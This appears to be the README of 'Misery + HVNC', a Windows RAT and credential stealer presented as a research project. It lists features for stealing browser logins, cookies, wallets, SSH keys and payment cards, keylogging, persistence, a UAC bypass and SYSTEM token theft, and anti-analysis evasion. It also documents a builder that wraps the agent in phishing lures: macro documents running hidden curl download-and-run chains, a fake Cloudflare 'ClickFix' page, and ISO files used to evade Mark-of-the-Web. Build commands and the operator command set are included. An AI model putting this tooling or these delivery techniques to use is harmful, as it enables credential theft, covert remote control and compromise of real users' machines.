7.7 KiB
Misery + HVNC
a devoted sister of the Church of Malware
HVNC RAT and stealer research project, derived from Misery. For local testing and research only.
Features
- Hidden desktop (
hvnc start): GDI apps on a hidden desktop, streamed live - Interactive browser (
hvnc launch chrome): real Chromium with the victim's logins, driven over CDP - Ghosted browser (
ghost <url>): hidden Chrome/Edge session using the victim's cookies and logins - Credential harvesting: Chrome, Edge, Brave, Opera, Opera GX, Firefox
- App-session harvesting: payment cards, Discord, Steam, Telegram, Slack, VS Code, AWS, SSH keys, Wi-Fi passwords, wallet extension paths, Signal session listing
- Encrypted C2 channel: reverse TCP (default) or HTTPS beaconing through a CDN
- Payload builder (
setup.py): msfvenom-style config, ECDH key handling, and-pdelivery wrappers fordocm,xlsm,lnk,pdf,html,clickfix_html,iso,polyglot_exe_zip, andpolyglot_html - Keylogger and clipboard monitoring
- Persistence: HKCU Run key and WMI event subscriptions
- Elevation (
elevate): silent UAC bypass to High via PEB masquerade and CMSTPLUA/ICMLuaUtil, then SYSTEM through SeDebug token theft from a non-PPL system process. Verified on Windows 11 25H2 (build 26200) - Anti-analysis: user-mode environment checks, reflective injection
VirusTotal
Quick start
setup.py writes src/config.h, saves the console's ECDH key to .misery_key, and builds the project:
python setup.py -g # interactive
python setup.py -t tcp LHOST=127.0.0.1 LPORT=4444 -o agent # non-interactive
Run the console listener, then the agent:
.\build\console.exe
.\build\agent.exe
Type help in the console for the full command list.
Payload wrappers
The builder (setup.py -p <formats>) packages the agent into delivery
filetypes in dist/ and records each one in <out>.manifest.json with its
sha256 and size. python setup.py --list-formats prints the current list with
dependencies.
docm- Word macro document;Document_Openshells a hidden cmd/curl download-and-run. The macro comes from a Word-authored compiled base (wrappers_bases/docm_base.docm); only the stage URL and agent filename are injected as document variables and read at open time, because rebuild-generated macro streams open without auto-event hooks (verified live 2026-08)xlsm- Excel macro workbook;Workbook_Openshells a hidden cmd/curl download-and-run. Same design: an Excel-authored compiled base (wrappers_bases/xlsm_base.xlsm) with the runtime values in a hiddencfgsheetlnk- shortcut plus companion.cmd; the LNK probes Downloads/Desktop for the.cmd, which opens a decoy PDF then fetches and runs the agent (the chain lives in the.cmdbecause Defender's FastPath flags any LNK-launched curl download cmdline)pdf- agent embedded as a PDF attachment, launched on openhtml- OneDrive-style page; the agent hides in a zip blob behind a button clickclickfix_html- fake Cloudflare "Verify you are human" page; checking the box copies a cmd/curl download-and-run command to the clipboard and shows the Win+R / Ctrl+V / Enter stepsiso- ISO with the agent inside, sidesteps MOTWpolyglot_exe_zip- runs as an exe, opens as a zip holding adocument.pdf.lnkand its companion.cmdpolyglot_html- runs as an exe, shows a decoy page in a browser
python setup.py -t tcp LHOST=10.0.0.5 LPORT=4444 -p docm,iso -o misery STAGE_URL=http://10.0.0.5:8080/misery.exe
-p all builds every format. The macro, lnk, clickfix, and polyglot_exe_zip
formats fetch the agent from STAGE_URL when the target opens them; pdf, html,
iso, and polyglot_html carry the agent themselves. The macro files ship with
decoy content, and the lnk/pdf formats show a decoy document, so they read as
normal business documents instead of empty templates.
The docm and xlsm bases are compiled by Word/Excel themselves so the
Document_Open / Workbook_Open hooks actually fire: pyopenvba-style
rebuilds write source-only module streams that Office opens in a degraded
state where the auto-events never run (reproduced and root-caused live
2026-08). The wrapper copies the base, fills decoy content, and injects the
per-build values (Word docvars in word/settings.xml, Excel cfg-sheet cells
in xl/sharedStrings.xml); the pre-compiled VBA builds the download chain
from Chr()-encoded parts plus those values at open time, so no macro stream
is ever rewritten.
The lnk and polyglot_exe_zip fetch their decoy PDF from the same directory as
STAGE_URL, so host the generated <out>.cmd and <out>.decoy.pdf next to
the agent.
Delivery note: browsers tag downloaded files with the Mark-of-the-Web
(Zone.Identifier), which trips SmartScreen on macros and executables. Extract
a container with 7-Zip or WinRAR to drop the MOTW (Explorer itself
propagates it), so the iso wrapper or archiver extraction is the practical
route for the macro and exe formats; the pdf and html formats are fine to
serve straight from a browser.
The wrappers use these optional libs; a missing lib just skips the formats that need it:
pip install pylnk3 pycdlib pikepdf python-docx openpyxl
The docm/xlsm bases live in wrappers_bases/ and ship with the repo; rebuild
them in Office if you ever change the macro logic (see the wrapper docstring
notes), then commit the new base.
Commands
| Command | What it does |
|---|---|
bot |
list bots; bot <id> targets one, bot all broadcasts |
steal |
run credential and session harvesting |
loot |
dump the last steal result JSON raw to the terminal |
elevate [system] |
relaunch the agent as admin; system chains to SYSTEM |
hvnc start / hvnc stop |
start or stop the hidden desktop session |
hvnc launch [path] |
launch an app (default Chrome) on the hidden desktop |
hvnc quality [10-100] |
set streamed frame JPEG quality |
ghost <url> |
open a URL in a ghosted hidden browser |
ghost nav <url> |
navigate the ghost browser |
ghost stop |
stop the ghost session |
keylog |
toggle the keylogger |
clip |
read the victim's clipboard |
shell / ps <cmd> |
run a hidden PowerShell one-liner on the agent |
history |
show command history |
clear / exit |
clear the terminal / quit |
Build
Requires cmake and a C++ toolchain (MSVC, MinGW, or Clang).
MSVC:
cmake -S . -B build -G "Visual Studio 17 2022" -A x64
cmake --build build --config Release
MinGW:
cmake -S . -B build -G "MinGW Makefiles" -DCMAKE_BUILD_TYPE=Release
cmake --build build -j 4
A fresh checkout builds against 127.0.0.1:4444. Run setup.py once so .misery_key exists.
Layout
src/agent: entry, C2 client, injector, persistencesrc/console: operator console + listenersrc/payload: payload DLL, reflective loader, trampolinesrc/stealer: Misery-derived sourcessrc/hvnc: hidden-desktop sessionsrc/ghost: ghosted browser sessionsrc/browser: CDP client (Page/Input over WebSocket)src/rat: keylogger + clipboardsrc/transport: encrypted TCP framing, HTTPS beacon carrier, compressionsrc/evasion: indirect syscalls, anti-analysis, UAC/token elevation, helperswrappers_bases/: Office-authored compiled macro bases used by the docm/xlsm wrappersbuild/: out-of-source build dir
Licence
No licence granted. Research code for study only; not licensed for redistribution or commercial use.

